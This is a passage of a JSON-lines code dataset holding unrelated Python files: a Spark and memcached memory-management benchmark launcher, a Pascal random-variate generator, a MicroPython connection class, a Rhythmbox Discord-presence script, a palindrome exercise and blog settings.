60\n\ndef _jvm_conf(heap_size: str, sigve: bool = False, jvm_args: List[str] = None) -> jvm_conf:\n\targs = [ \"-XX:+UseG1GC\", \"-XX:+UseSIGVEPidFile\" ]\n\targs.append(\"-XX:+PrintGCApplicationStoppedTime\")\n\tif sigve:\n\t\targs.append(\"-XX:+UseSIGVE\")\n\t\targs.append(\"-XX:+ExplicitGCInvokesConcurrent\")\n\t\targs.append(\"-XX:SIGVECost=25\")\n\tif jvm_args:\n\t\targs.extend(jvm_args)\n\treturn jvm_conf(java_home, args = args).heap(heap_size)\n\nclass spark_params:\n\tdef __init__(self, heap_size: int, workload: str = \"ml/kmeans\", scale: str = None,\n\t\t\tmem_frac: float = -1, mem_storage_frac: float = -1,\n\t\t\tsigve: bool = False, sigve_n: int = -1, sigve_f: float = -1) -> None:\n\t\tself.heap_size: int = heap_size\n\t\tself.mem_frac: float = mem_frac\n\t\tself.mem_storage_frac: float = mem_storage_frac\n\t\tself.workload: str = workload\n\t\tself.scale: str = scale\n\t\tif scale == None:\n\t\t\tif self.workload == \"ml/kmeans\":\n\t\t\t\tself.scale = \"gigantic\"\n\t\t\telif self.workload == \"websearch/pagerank\":\n\t\t\t\t#self.scale = \"hugeplus\"\n\t\t\t\tself.scale = \"hugeplusplus\"\n\t\t\telif self.workload == \"graph/nweight\":\n\t\t\t\t#self.scale = \"largeplus\"\n\t\t\t\tself.scale = \"largeplus_p120_\"\n\t\t\telse:\n\t\t\t\tprint(\"[error] bogus workload: \" + self.workload)\n\t\t\t\tassert(False)\n\t\tself.sigve: bool = sigve\n\t\tself.sigve_n: int = sigve_n\n\t\tself.sigve_f: float = sigve_f\n\nclass detc_params:\n\tdef __init__(self, size: int, wounds: int = 5, clients: int = 5,\n\t\t\trequests: int = 13 * 100 * 1000, keys: int = 12 * 1000 * 1000,\n\t\t\tcores: int = 5, gc: int = 100, port: int = 32232,\n\t\t\tlow_shrink: int = 0, high_shrink: int = 6) -> None:\n\t\tself.size: int = size\n\t\tself.wounds: int = wounds\n\t\tself.clients: int = clients\n\t\tself.requests: int = requests\n\t\tself.keys: int = keys\n\t\tself.cores: int = cores\n\t\tself.gc: int = gc\n\t\tself.port: int = port\n\t\tself.low_shrink: int = low_shrink\n\t\tself.high_shrink: int = high_shrink\n\nclass memcached_params:\n\tdef __init__(self, size: int, requests: int = 13 * 100 * 1000, keys: int = 12 * 1000 * 1000,\n\t\t\tport: int = 32232) -> None:\n\t\tself.size: int = size\n\t\tself.requests: int = requests\n\t\tself.keys: int = keys\n\t\tself.port: int = port\n\t\tself.sigve: bool = False\n\ndef init_spark_old(conf: config, sps: List[spark_params], jvm_args: List[str] = None) -> List[jvm_conf]:\n\tcount: Dict[str, int] = {}\n\tjvms: List[jvm_conf] = []\n\tfor sp in sps:\n\t\tif sp.workload not in count:\n\t\t\tcount[sp.workload] = 0\n\t\tsp.scale += str(count[sp.workload])\n\t\tcount[sp.workload] += 1\n\n\t\tif conf == config.sigve:\n\t\t\tjvm = _jvm_conf(\"64G\", True, jvm_args)\n\t\telse:\n\t\t\tjvm = _jvm_conf(str(sp.heap_size) + \"G\", False)\n\t\tjvms.append(jvm)\n\treturn jvms\n\ndef init_spark(conf: config, sp: spark_params, jvm_args: List[str] = None) -> jvm_conf:\n\tif conf == config.sigve:\n\t\tjvm = _jvm_conf(str(sp.heap_size) + \"G\", True, jvm_args)\n\telse:\n\t\tjvm = _jvm_conf(str(sp.heap_size) + \"G\", False)\n\treturn jvm\n\ndef init_detc(conf: config, dp: detc_params) -> go_conf:\n\t_go_conf: Dict[str, str] = {\n\t\t\"GOMAXPROCS\": str(5),\n\t}\n\tif conf == config.sigve:\n\t\tgo = go_conf(_go_conf)\n\t\tgo.sigve()\n\telse:\n\t\tif conf != config.pure_default:\n\t\t\t_go_conf[\"GOGC\"] = str(dp.gc)\n\t\tgo = go_conf(_go_conf)\n\treturn go\n\ndef init_global(conf: config, cgroup_mem: str = \"64g\") -> Tuple[cgroup, sigve_conf]:\n\tcg = cgroup(bakers, \"memory:thermostat\", cgroup_mem)\n\tsc: sigve_conf = None\n\tif conf == config.sigve:\n\t\tif cgroup_mem == \"64g\":\n\t\t\tsc = sigve_conf(java_home)\n\t\telse:\n\t\t\tsc = sigve_conf(java_home,\n\t\t\t\ttop = str(7 * 1024 + 512) + \"m\",\n\t\t\t\tlow_wm_init = str(6 * 1024 + 512) + \"m\",\n\t\t\t\thigh_wm_init = \"7g\")\n\treturn cg, sc\n\ndef init_params(conf: config, params: List[Union[spark_params, detc_params, memcached_params]]) -> List[Union[jvm_conf, go_conf]]:\n\truntimes: List[Union[jvm_conf, go_conf]] = []\n\tspark_count: Dict[str, int] = {}\n\tport_count: int = 0\n\tfor param in params:\n\t\tif isinstance(param, spark_params):\n\t\t\tif param.workload not in spark_count:\n\t\t\t\tspark_count[param.workload] = 0\n\t\t\tparam.scale += str(spark_count[param.workload])\n\t\t\tspark_count[param.workload] += 1\n\t\t\truntimes.append(init_spark(conf, param))\n\t\telif isinstance(param, detc_params):\n\t\t\tparam.port += port_count\n\t\t\tport_count += 1\n\t\t\truntimes.append(init_detc(conf, param))\n\t\telif isinstance(param, memcached_params):\n\t\t\tparam.port += port_count\n\t\t\tport_count += 1\n\t\t\tif conf == config.sigve:\n\t\t\t\tparam.sigve = True\n\t\t\truntimes.append(None)\n\t\telse:\n\t\t\tprint(\"[error] init_param invalid param type... {}\".format(param))\n\t\t\tsys.exit(1)\n\treturn runtimes\n\ndef workload_n(conf: config, params: List[Union[spark_params, detc_params, memcached_params]], delay: int = 0, path: str = None, cgroup_mem: str = \"64g\") -> None:\n\tcg, sc = init_global(conf, cgroup_mem)\n\tif sc != None and path != None and \"hightop\" in path:\n\t\tsc.top = 64 * 1024 * 1024 * 1024\n\tif sc != None and path != None and \"nokill\" in path:\n\t\tsc.kill_time = 3 * 3600 * 1000\n\tif sc != None and path != None and \"static\" in path:\n\t\tsc.wm_increment_percent = 0\n\t\tsc.low_wm_init = 40 * 1024 * 1024 * 1024\n\t\tsc.high_wm_init = 45 * 1024 * 1024 * 1024\n\tif sc != None and path != None and \"dynamic\" in path:\n\t\tsc.low_wm_init = 40 * 1024 * 1024 * 1024\n\t\tsc.high_wm_init = 45 * 1024 * 1024 * 1024\n\truntimes = init_params(conf, params)\n\n\tapps: List[application] = []\n\tfor param, runtime in zip(params, runtimes):\n\t\tif isinstance(param, spark_params):\n\t\t\tif path != None and \"util-smolbrain\" in path and len(apps) == 2:\n\t\t\t\tapps.append(hibench_spark(bakers, hibench_home, spark_home, cast(jvm_conf, runtime),\n\t\t\t\t\tscale = param.scale, workload = param.workload,\n\t\t\t\t\tmax_cores = 5 * 8, cores = 5,\n\t\t\t\t\tmem_frac = param.mem_frac, mem_storage_frac = param.mem_storage_frac,\n\t\t\t\t\tcg = None))\n\t\t\telse:\n\t\t\t\tif cgroup_mem == \"64g\":\n\t\t\t\t\tmax_cores = 5 * 8\n\t\t\t\t\tcores = 5\n\t\t\t\telse:\n\t\t\t\t\tmax_cores = 8\n\t\t\t\t\tcores = 8\n\t\t\t\tapps.append(hibench_spark(bakers, hibench_home, spark_home, cast(jvm_conf, runtime),\n\t\t\t\t\tscale = param.scale, workload = param.workload,\n\t\t\t\t\tmax_cores = max_cores, cores = cores,\n\t\t\t\t\tmem_frac = param.mem_frac, mem_storage_frac = param.mem_storage_frac,\n\t\t\t\t\tsigve = param.sigve, sigve_n = param.sigve_n, sigve_f = param.sigve_f,\n\t\t\t\t\tcg = cg))\n\t\telif isinstance(param, detc_params):\n\t\t\tapps.append(detc(bakers, detc_home, cast(go_conf, runtime), param.size, param.wounds, param.low_shrink, param.high_shrink, param.port, cg))\n\t\telif isinstance(param, memcached_params):\n\t\t\tapps.append(memcached(bakers, memcached_home, param.size, param.port, param.sigve, cg))\n\t\telse:\n\t\t\tprint(\"[error] workload_n apps invalid param type... {}\".format(param))\n\t\t\tsys.exit(1)\n\n\tstresses: List[benchmark] = []\n\tfor i, app_param in enumerate(zip(apps, params)):\n\t\tapp, param = app_param\n\t\tif isinstance(app, hibench_spark):\n\t\t\tstresses.append(hibench_stress(bakers, cast(hibench_spark, app), 0 if i == 0 else delay))\n\t\telif isinstance(app, detc):\n\t\t\tdp = cast(detc_params, param)\n\t\t\tstresses.append(detc_stress(bakers, cast(detc, app), 0 if i == 0 else delay, dp.clients, dp.requests, dp.keys, dp.cores, dp.port))\n\t\telif isinstance(app, memcached):\n\t\t\tmcp = cast(memcached_params, param)\n\t\t\tstresses.append(memcached_stress(bakers, cast(memcached, app), 0 if i == 0 else delay, mcp.requests, mcp.keys, mcp.port))\n\t\telse:\n\t\t\tprint(\"[error] workload_n stresses invalid param type... {}\".format(param))\n\t\t\tsys.exit(1)\n\n\ttest_runner.run_1time(path if path else sys.argv[1], conf, stresses, _sigve_conf = sc)\n\ndef run_global_optimal(prefix: str, count: int = 1) -> None:\n\tnw = lambda: spark_params(24, \"graph/nweight\", mem_frac = 0.5, mem_storage_frac = 0.9)\n\tdetc = lambda: detc_params(10, gc = 5)\n\tkm = lambda: spark_params(14, \"ml/kmeans\", mem_frac = 0.7, mem_storage_frac = 0.9)\n\tpr = lambda: spark_params(14, \"websearch/pagerank\", mem_frac = 0.7, mem_storage_frac = 0.9)\n\n\tfor i in range(count):\n\t\t##WW0\n\t\tworkload_n(config.global_optimal,\n\t\t\t[ nw(), nw() ],\n\t\t\t0, prefix + \"-globaloptimal-WW0\")\n\t\t##CCC0\n\t\tworkload_n(config.global_optimal,\n\t\t\t[ detc(), detc(), detc() ],\n\t\t\t0, prefix + \"-globaloptimal-CCC0\")\n\t\t##PPP0\n\t\tworkload_n(config.global_optimal,\n\t\t\t[ pr(), pr(), pr() ],\n\t\t\t0, prefix + \"-globaloptimal-PPP0\")\n\t\t##MMM0\n\t\tworkload_n(config.global_optimal,\n\t\t\t[ km(), km(), km() ],\n\t\t\t0, prefix + \"-globaloptimal-MMM0\")\n\n\t\t##MMM180\n\t\tworkload_n(config.global_optimal,\n\t\t\t[ km(), km(), km() ],\n\t\t\t180, prefix + \"-globaloptimal-MMM180\")\n\t\t##MMW180\n\t\tworkload_n(config.global_optimal,\n\t\t\t[ km(), km(), nw() ],\n\t\t\t180, prefix + \"-globaloptimal-MMW180\")\n\t\t##WMM300\n\t\tworkload_n(config.global_optimal,\n\t\t\t[ nw(), km(), km() ],\n\t\t\t300, prefix + \"-globaloptimal-WMM300\")\n\t\t##MCM180\n\t\tworkload_n(config.global_optimal,\n\t\t\t[ km(), detc(), km() ],\n\t\t\t180, prefix + \"-globaloptimal-MCM180\")\n\t\t##CPW180\n\t\tworkload_n(config.global_optimal,\n\t\t\t[ detc(), pr(), nw() ],\n\t\t\t180, prefix + \"-globaloptimal-CPW180\")\n\t\t##WPM180\n\t\tworkload_n(config.global_optimal,\n\t\t\t[ nw(), pr(), km() ],\n\t\t\t180, prefix + \"-globaloptimal-WPM180\")\n\t\t##CWM180\n\t\tworkload_n(config.global_optimal,\n\t\t\t[ detc(), nw(), km() ],\n\t\t\t180, prefix + \"-globaloptimal-CWM180\")\n\t\t##CMW180\n\t\tworkload_n(config.global_optimal,\n\t\t\t[ detc(), km(), nw() ],\n\t\t\t180, prefix + \"-globaloptimal-CMW180\")\n\t\t##WMP240\n\t\tworkload_n(config.global_optimal,\n\t\t\t[ nw(), km(), pr() ],\n\t\t\t240, prefix + \"-globaloptimal-WMP240\")\n\t\t##CCC480\n\t\tworkload_n(config.global_optimal,\n\t\t\t[ detc(), detc(), detc() ],\n\t\t\t480, prefix + \"-globaloptimal-CCC480\")\n\t\t##CCW300\n\t\tworkload_n(config.global_optimal,\n\t\t\t[ detc(), detc(), nw() ],\n\t\t\t300, prefix + \"-globaloptimal-CCW300\")\n\t\t##MWP180\n\t\tworkload_n(config.global_optimal,\n\t\t\t[ km(), nw(), pr() ],\n\t\t\t180, prefix + \"-globaloptimal-MWP180\")\n\ndef run_default(prefix: str, count: int = 1) -> None:\n\tnw = lambda: spark_params(16, \"graph/nweight\")\n\tdetc = lambda: detc_params(10)\n\tkm = lambda: spark_params(16, \"ml/kmeans\")\n\tpr = lambda: spark_params(16, \"websearch/pagerank\")\n\n\tfor i in range(count):\n\t\t##PPP0\n\t\tworkload_n(config.pure_default,\n\t\t\t\t[ pr(), pr(), pr() ],\n\t\t\t\t0, prefix + \"-default-PPP0\")\n\t\t##MMM0\n\t\tworkload_n(config.pure_default,\n\t\t\t\t[ km(), km(), km() ],\n\t\t\t\t0, prefix + \"-default-MMM0\")\n\t\t##CCC0\n\t\tworkload_n(config.pure_default,\n\t\t\t\t[ detc(), detc(), detc() ],\n\t\t\t\t0, prefix + \"-default-CCC0\")\n\n\t\t##MMM180\n\t\tworkload_n(config.pure_default,\n\t\t\t\t[ km(), km(), km() ],\n\t\t\t\t180, prefix + \"-default-MMM180\")\n\t\t##MCM180\n\t\tworkload_n(config.pure_default,\n\t\t\t\t[ km(), detc(), km() ],\n\t\t\t\t180, prefix + \"-default-MCM180\")\n\t\t##CCC480\n\t\tworkload_n(config.pure_default,\n\t\t\t\t[ detc(), detc(), detc() ],\n\t\t\t\t480, prefix + \"-default-CCC480\")\n\ndef run_oracle(conf: config, prefix: str, count: int = 1) -> None:\n\tdetc = lambda x: detc_params(x, gc = 5)\n\tif conf == config.big_brain:\n\t\tkm = lambda x: spark_params(x, \"ml/kmeans\", mem_frac = 0.7, mem_storage_frac = 0.9)\n\t\tnw = lambda x: spark_params(x, \"graph/nweight\", mem_frac = 0.5, mem_storage_frac = 0.9)\n\t\tpr = lambda x: spark_params(x, \"websearch/pagerank\", mem_frac = 0.7, mem_storage_frac = 0.9)\n\t\tpath = \"oracle-spark\"\n\telse:\n\t\tkm = lambda x: spark_params(x, \"ml/kmeans\")\n\t\tnw = lambda x: spark_params(x, \"graph/nweight\")\n\t\tpr = lambda x: spark_params(x, \"websearch/pagerank\")\n\t\tpath = \"oracle\"\n\n\tfor i in range(count):\n\t\t##WW0\n\t\tworkload_n(conf,\n\t\t\t[ nw(27), nw(27) ],\n\t\t\t0, prefix + \"-\" + path + \"-WW0\")\n\t\t##CCC0\n\t\tworkload_n(conf,\n\t\t\t[ detc(16), detc(16), detc(16) ],\n\t\t\t0, prefix + \"-\" + path + \"-CCC0\")\n\t\t##PPP0\n\t\tworkload_n(conf,\n\t\t\t[ pr(18), pr(18), pr(18) ],\n\t\t\t0, prefix + \"-\" + path + \"-PPP0\")\n\t\t##MMM0\n\t\tworkload_n(conf,\n\t\t\t[ km(18), km(18), km(18) ],\n\t\t\t0, prefix + \"-\" + path + \"-MMM0\")\n\n\t\t##MMM180\n\t\tworkload_n(conf,\n\t\t\t[ km(18), km(18), km(18) ],\n\t\t\t180, prefix + \"-\" + path + \"-MMM180\")\n\t\t##MMW180\n\t\tworkload_n(conf,\n\t\t\t[ km(16), km(16), nw(24) ],\n\t\t\t180, prefix + \"-\" + path + \"-MMW180\")\n\t\t##WMM300\n\t\tworkload_n(conf,\n\t\t\t[ nw(24), km(16), km(16) ],\n\t\t\t300, prefix + \"-\" + path + \"-WMM300\")\n\t\t##MCM180\n\t\tworkload_n(conf,\n\t\t\t[ km(20), detc(13), km(20) ],\n\t\t\t180, prefix + \"-\" + path + \"-MCM180\")\n\t\t##CPW180\n\t\tworkload_n(conf,\n\t\t\t[ detc(13), pr(16), nw(24) ],\n\t\t\t180, prefix + \"-\" + path + \"-CPW180\")\n\t\t##WPM180\n\t\tworkload_n(conf,\n\t\t\t[ nw(24), pr(16), km(14) ],\n\t\t\t180, prefix + \"-\" + path + \"-WPM180\")\n\t\t##CWM180\n\t\tworkload_n(conf,\n\t\t\t[ detc(11), nw(24), km(17) ],\n\t\t\t180, prefix + \"-\" + path + \"-CWM180\")\n\t\t##CMW180\n\t\tworkload_n(conf,\n\t\t\t[ detc(11), km(18), nw(24) ],\n\t\t\t180, prefix + \"-\" + path + \"-CMW180\")\n\t\t##WMMP240\n\t\tworkload_n(conf,\n\t\t\t[ nw(24), km(14), pr(16) ],\n\t\t\t240, prefix + \"-\" + path + \"-WMP240\")\n\t\t##CCC480\n\t\tworkload_n(conf,\n\t\t\t[ detc(16), detc(16), detc(16) ],\n\t\t\t480, prefix + \"-\" + path + \"-CCC480\")\n\t\t##CCW300\n\t\tworkload_n(conf,\n\t\t\t[ detc(14), detc(14), nw(24) ],\n\t\t\t300, prefix + \"-\" + path + \"-CCW300\")\n\t\t##MWP180\n\t\tworkload_n(conf,\n\t\t\t[ km(14), nw(24), pr(16) ],\n\t\t\t180, prefix + \"-\" + path + \"-MWP180\")\n\ndef run_m3(prefix: str, count: int = 1) -> None:\n\tnw = lambda: spark_params(64, \"graph/nweight\")\n\tdetc = lambda: detc_params(64)\n\tkm = lambda: spark_params(64, \"ml/kmeans\")\n\tpr = lambda: spark_params(64, \"websearch/pagerank\")\n\n\tfor i in range(count):\n\t\t##WW0\n\t\tworkload_n(config.sigve,\n\t\t\t[ nw(), nw() ],\n\t\t\t0, prefix + \"-m3-WW0\")\n\t\t##CCC0\n\t\tworkload_n(config.sigve,\n\t\t\t[ detc(), detc(), detc() ],\n\t\t\t0, prefix + \"-m3-CCC0\")\n\t\t##PPP0\n\t\tworkload_n(config.sigve,\n\t\t\t[ pr(), pr(), pr() ],\n\t\t\t0, prefix + \"-m3-PPP0\")\n\t\t##MMM0\n\t\tworkload_n(config.sigve,\n\t\t\t[ km(), km(), km() ],\n\t\t\t0, prefix + \"-m3-MMM0\")\n\n\t\t##MMM180\n\t\tworkload_n(config.sigve,\n\t\t\t[ km(), km(), km() ],\n\t\t\t180, prefix + \"-m3-MMM180\")\n\t\t##MMW180\n\t\tworkload_n(config.sigve,\n\t\t\t[ km(), km(), nw() ],\n\t\t\t180, prefix + \"-m3-MMW180\")\n\t\t##WMM300\n\t\tworkload_n(config.sigve,\n\t\t\t[ nw(), km(), km() ],\n\t\t\t300, prefix + \"-m3-WMM300\")\n\t\t##MCM180\n\t\tworkload_n(config.sigve,\n\t\t\t[ km(), detc(), km() ],\n\t\t\t180, prefix + \"-m3-MCM180\")\n\t\t##CPW180\n\t\tworkload_n(config.sigve,\n\t\t\t[ detc(), pr(), nw() ],\n\t\t\t180, prefix + \"-m3-CPW180\")\n\t\t##WPM180\n\t\tworkload_n(config.sigve,\n\t\t\t[ nw(), pr(), km() ],\n\t\t\t180, prefix + \"-m3-WPM180\")\n\t\t##CWM180\n\t\tworkload_n(config.sigve,\n\t\t\t[ detc(), nw(), km() ],\n\t\t\t180, prefix + \"-m3-CWM180\")\n\t\t##CMW180\n\t\tworkload_n(config.sigve,\n\t\t\t[ detc(), km(), nw() ],\n\t\t\t180, prefix + \"-m3-CMW180\")\n\t\t##WMP240\n\t\tworkload_n(config.sigve,\n\t\t\t[ nw(), km(), pr() ],\n\t\t\t240, prefix + \"-m3-WMP240\")\n\t\t##CCC480\n\t\tworkload_n(config.sigve,\n\t\t\t[ detc(), detc(), detc() ],\n\t\t\t480, prefix + \"-m3-CCC480\")\n\t\t##CCW300\n\t\tworkload_n(config.sigve,\n\t\t\t[ detc(), detc(), nw() ],\n\t\t\t300, prefix + \"-m3-CCW300\")\n\t\t##MWP180\n\t\tworkload_n(config.sigve,\n\t\t\t[ km(), nw(), pr() ],\n\t\t\t180, prefix + \"-m3-MWP180\")\n\ndef memcached_workload(prefix: str, count: int = 1) -> None:\n\tglobal bakers\n\tbakers = set([ \"baker10\" ])\n\n\tkm = lambda x, y: spark_params(x, \"ml/kmeans\", \"large\", sigve = y)\n\n\tfor i in range(count):\n\t\tworkload_n(config.smol_brain,\n\t\t\t[ km(4, False), memcached_params(4) ],\n\t\t\t240, prefix + \"-memecached-vanilla\", \"8g\")\n\n\t\tworkload_n(config.sigve,\n\t\t\t[ km(8, True), memcached_params(8) ],\n\t\t\t240, prefix + \"-memecached-m3\", \"8g\")\n\ndef main() -> None:\n\t# Each of these functions will run a set of workloads with a certain configuration.\n\t# The string argument (\"artifact\") is a prefix for the directory the tests will be saved in.\n\t# The integer argument (1) is the number of runs to perform.\n\t# As is, this will run all benchmarks for the main results (Figure 5 and 8) once.\n\trun_default(\"artifact\", 1)\n\n\trun_m3(\"artifact\", 1)\n\trun_oracle(config.big_brain, \"artifact\", 1) # oracle with spark conf\n\trun_oracle(config.smol_brain, \"artifact\", 1) # oracle without spark conf\n\trun_global_optimal(\"artifact\", 1)\n\trun_default(\"artifact\", 1)\n\n\t# In order to run this the Spark cluster must be restarted with only one worker.\n\t# Comment all workers except \"baker10\" in \"~/applications/spark-2.3.2-bin-hadoop2.7/conf/slaves\"\n\t#memcached_workload(\"artifact\", 1)\n\nif __name__ == \"__main__\":\n\tmain()\n\n","sub_path":"launch.py","file_name":"launch.py","file_ext":"py","file_size_in_byte":16241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"55519812","text":"import numpy as np \r\nfrom math import log, exp, factorial\r\nfrom matplotlib import pyplot as plt\r\nfrom generator import nro_random\r\nfrom graph_decoration import *\r\n\r\ndef pascal(k, p): \r\n x = 0\r\n producto = 1\r\n for i in range(k):\r\n r = nro_random() # Genera nro pseudoaleatorio\r\n producto *= r\r\n x = log(producto) / log(1 - p) # T.Inv indirecta\r\n return int(x) # Redondeo al entero mas proximo\r\n\r\ndef generate_pascal(k, p, n):\r\n corrida = []\r\n for i in range(n): \r\n x = pascal(k, p) # Genero nro con dist. de Pascal\r\n corrida.append( x ) # Secuencia de nros con dist. de Pascal\r\n return corrida\r\n\r\ndef get_func_acumulada(f_den, corrida):\r\n # Funcion acumulada\r\n f_acum = []\r\n total = sum(f_den)\r\n f_acum.append(f_den[0] / total) # Sumo los valores de f(x) - Es como hacer la integral.\r\n for i in range(len(corrida) - 1):\r\n f_acum.append(f_acum[i] + f_den[i + 1] / total) \r\n\r\n return f_acum\r\n\r\ndef graph_pascal(corrida, k, p):\r\n fig1 = plt.figure(\"Distribucion de Pascal\")\r\n fig1.subplots_adjust(hspace=0.46, top = 0.78, bottom = 0.27, wspace=0.30, left=0.05, right=0.98)\r\n\r\n # Diagrama de barras\r\n fig1.add_subplot(1,3,1)\r\n plt.hist(corrida,max(corrida) * 2, (0, max(corrida) - 1), color = pascal_hist, edgecolor = pascal_borde_hist, linewidth=1)\r\n plt.xlabel('Valor de x')\r\n plt.ylabel('Frecuencia absoluta')\r\n poner_fondo_color()\r\n plt.grid(linestyle = '--')\r\n\r\n # Funcion de probabilidad\r\n f_den = []\r\n for x in corrida:\r\n f = factorial(k + x - 1) / (factorial(x) * factorial(k - 1))\r\n f = f * (p ** k) * ((1 - p) ** x) # Funcion probabilidad pascal\r\n f_den.append(f)\r\n\r\n fig1.add_subplot(1,3,2)\r\n plt.stem(corrida, f_den, use_line_collection = True, basefmt= 'None', linefmt= pascal_hist)\r\n plt.xlabel('Valor de x')\r\n plt.ylabel('f(x) - funcion de densidad')\r\n poner_fondo_color()\r\n plt.grid(linestyle = '--')\r\n\r\n # Funcion acumulada\r\n corrida.sort()\r\n f_acum = get_func_acumulada(f_den, corrida)\r\n \r\n fig1.add_subplot(1,3,3)\r\n for i in range(len(corrida) - 1):\r\n plt.hlines(y= f_acum[i], xmin= corrida[i], xmax= corrida[i + 1], color = pascal_hist)\r\n if corrida[i] != corrida[i + 1]:\r\n plt.scatter([corrida[i]],[f_acum[i]], 20, color=unf_puntos)\r\n poner_fondo_color()\r\n plt.hlines(y= 1, xmin=corrida[0], xmax= int(corrida[-1]), color = exp_puntos, linestyle = '--')\r\n plt.grid(linestyle = '--')\r\n plt.xlabel('Valor de x')\r\n plt.ylabel('Frecuencia acumulada')\r\n plt.show()","sub_path":"TP 2.2 - Generadores VA/Codigo/e_pascal.py","file_name":"e_pascal.py","file_ext":"py","file_size_in_byte":2656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"319550564","text":"import queue\nfrom thonny.misc_utils import TimeHelper\nfrom queue import Queue\nimport re\n\n\nclass MicroPythonConnection:\n \"\"\"Utility class for using Serial or WebSocket connection\n \n Uses background thread to read from the source as soon as possible\n to avoid loss of data (because buffer overflow or the device discarding \n unread data).\n\n Allows writing with delays after each n bytes.\n \n Allows unreading data. \n \"\"\"\n\n def __init__(self):\n self._read_queue = Queue() # populated by reader thread\n self._read_buffer = bytearray() # used for unreading and postponing bytes\n self.num_bytes_received = 0\n self._error = None\n\n def read(self, size, timeout=1):\n if timeout == 0:\n raise TimeoutError()\n\n timer = TimeHelper(timeout)\n\n while len(self._read_buffer) < size:\n self._check_for_error()\n\n try:\n self._read_buffer.extend(self._read_queue.get(True, timer.time_left))\n except queue.Empty:\n raise TimeoutError(\"Reaction timeout. Bytes read: %s\" % self._read_buffer)\n\n try:\n data = self._read_buffer[:size]\n return data\n finally:\n del self._read_buffer[:size]\n\n def soft_read_until(self, terminator, timeout=1000000):\n return self.read_until(terminator, timeout, timeout_is_soft=True)\n\n def read_until(self, terminator, timeout=1000000, timeout_is_soft=False):\n timer = TimeHelper(timeout)\n\n if isinstance(terminator, str):\n terminator = re.compile(re.escape(terminator))\n\n match = None\n while True:\n self._check_for_error()\n\n match = re.search(terminator, self._read_buffer)\n if match:\n break\n\n try:\n data = self._read_queue.get(True, timer.time_left)\n # print(\"RR\", repr(data), file=sys.stderr)\n assert len(data) > 0\n self._read_buffer.extend(data)\n except queue.Empty:\n if timeout_is_soft:\n break\n else:\n raise TimeoutError(\"Reaction timeout. Bytes read: %s\" % self._read_buffer)\n\n if match:\n size = match.end()\n else:\n assert timeout_is_soft\n size = len(self._read_buffer)\n\n data = self._read_buffer[:size]\n del self._read_buffer[:size]\n return data\n\n def _fetch_to_buffer(self):\n while not self._read_queue.empty():\n self._read_buffer.extend(self._read_queue.get(True))\n\n def peek_incoming(self):\n self._fetch_to_buffer()\n return self._read_buffer\n\n def read_all(self):\n self._fetch_to_buffer()\n\n if len(self._read_buffer) == 0:\n self._check_for_error()\n\n try:\n return self._read_buffer\n finally:\n self._read_buffer = bytearray()\n\n def _check_for_error(self):\n if self._error is None:\n return\n\n raise ConnectionClosedException(self._error)\n\n def unread(self, data):\n self._read_buffer = data + self._read_buffer\n\n def write(self, data, block_size=32, delay=0.01):\n raise NotImplementedError()\n\n def _log_data(self, data):\n print(\n data.decode(\"Latin-1\")\n .replace(\"\\r\\n\", \"\\n\")\n .replace(\"\\x01\", \"①\")\n .replace(\"\\x02\", \"②\")\n .replace(\"\\x03\", \"③\")\n .replace(\"\\x04\", \"④\"),\n end=\"\",\n )\n\n def incoming_is_empty(self):\n return self._read_queue.empty() and len(self._read_buffer) == 0\n\n def outgoing_is_empty(self):\n return True\n\n def buffers_are_empty(self):\n return self.incoming_is_empty() and self.outgoing_is_empty()\n\n def reset_input_buffer(self):\n return self.read_all()\n\n def reset_output_buffer(self):\n pass\n\n def close(self):\n raise NotImplementedError()\n\n\nclass ConnectionFailedException(Exception):\n pass\n\n\nclass ConnectionClosedException(Exception):\n pass\n","sub_path":"thonny/plugins/micropython/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":4110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"607050494","text":"#!/usr/bin/python\nimport os, time\nfrom pypresence import Presence\n\nold_timestamp = '0:00'\nclient_id = \"543459024390324245\"\nRPC = Presence(client_id)\nRPC.connect()\n\nwhile True:\n\ttime.sleep(1)\n\tartist = os.popen(\"rhythmbox-client --print-playing-format=\\\"%ta\\\"\").read()\n\ttitle = os.popen(\"rhythmbox-client --print-playing-format=\\\"%tt\\\"\").read()\n\ttimestamp = os.popen(\"rhythmbox-client --print-playing-format=\\\"(%te / %td)\\\"\").read()\n\n\t# play / pause\n\tif timestamp != old_timestamp:\n\t\told_timestamp = timestamp\n\t\tsmall_image = \"play-circle\"\n\telse:\n\t\tsmall_image = \"pause-circle\"\n\t\ttimestamp = \" (Paused)\"\n\n\t# prevent crash when stopped\n\tif len(artist) < 2:\n\t\tartist = \" \"\n\tif len(title) < 2:\n\t\ttitle = \"IDLE\"\n\n\tRPC.update(details=artist, state=title + timestamp, large_image=\"rhythmbox\", small_image=small_image)\n","sub_path":"rbdrp.py","file_name":"rbdrp.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"274659318","text":"# Desafio 053: Crie um programa que leia uma frase qualquer\n# e diga se ela é um palíndromo, desconsiderando os espaços.\n\n\nfrase=str(input(\"Digite uma frase: \")).strip().upper()\nsepara = frase.split()\njunto = ''.join(separa)\ninverso = ''\n\nfor letra in range(len(junto) - 1, -1, -1):\n inverso += junto[letra]\n\nif inverso == junto:\n print('Temos um PALÍDROMO.')\nelse:\n print('Não temos um PALÍDROMO.')\n\nprint('{} -> {}'.format(junto, inverso))","sub_path":"Desafio053.py","file_name":"Desafio053.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"341334685","text":"import os\n\ntornado_settings = dict(\n template_path = os.path.join(os.path.dirname(__file__),\"template\"),\n static_path = os.path.join(os.path.dirname(__file__),\"static\"),\n debug = True,\n port=8888,\n)\n\n## Site\ntitle = 'ForgetWall'\nsubtitle = 'Write it down and forget all.'\ndescription = 'Wancheng`s blog'\nauthor = \"Wancheng Zhang\"\nurl = 'http://wancheng.site'\ntheme = 'default' \n\n# Category & Tag\nheaders = [\n {'title':'首页','url':'/','class':'fa fa-home'},\n {'title':'归档','url':'life.md','class':'fa fa-archive'},\n {'title':'关于','url':'life.md','class':'fa fa-about'},\n {'title':'订阅','url':'life.md','class':'fa 